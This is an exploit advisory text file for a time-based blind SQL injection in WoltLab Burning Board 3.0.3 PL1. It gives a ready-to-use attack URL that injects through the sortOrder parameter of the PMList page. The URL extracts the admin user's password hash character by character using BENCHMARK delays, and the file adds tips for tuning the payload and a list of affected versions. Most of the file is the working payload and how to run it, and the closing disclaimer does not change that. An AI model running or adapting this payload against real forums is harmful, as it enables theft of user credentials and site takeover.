woltlab303-sql.txt

`##############################################################################################  
WoltLab Burning Board 3.0.3 PL1 SQL Injection Vulnerability by NBBN  
Vendor: http://woltlab.de  
##############################################################################################  
  
  
::Proof of Concept  
http://site.tld/wbb3/index.php?page=PMList&folderID=0&pageNo=1&sortField=isViewed&sortOrder=ASC,   
(SELECT password FROM wcf1_user WHERE userID=1 AND   
IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,MD5(23)),1))  
  
An attacker should have to register at the board to use this.   
  
You can ask TRUE/FALSE questions to the database. Modify 3000000 if the stuff   
doesn't work. On some MySQL Versions you need to edit this query   
  
  
  
::Explain:  
  
...AND IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,MD5(23)),1))  
  
1,1 is the position in the crypted password. 55 is the char in the   
ascii-table.   
  
In this example we ask for number 7 in the hash, position 1. If the page load   
fast, you find a true char. If not, ask other chars ;-).If you enter a char   
that is higher then the true's, the page load fast to, so start from 48 first   
and go higher.   
  
  
  
::Vulnerabiltiy  
As I found this, WBB 3.0.4 was only running at the supportforums of woltlab so   
I don't test it, because there is no reason and I am not a cracker ;-)  
  
WoltLab Burning Board 3.0.3 PLX  
WoltLab Burning Board 3.0.2 PLX   
WoltLab Burning Board 3.0.1 PLX   
WoltLab Burning Board 3.0.0 PLX  
Possible WoltLab Burning Board 3.0.4 (not tested)...  
  
  
  
Please don't use this to crack forums. All what you do with this is at your   
own risk.   
  
  
  
  
  
  
`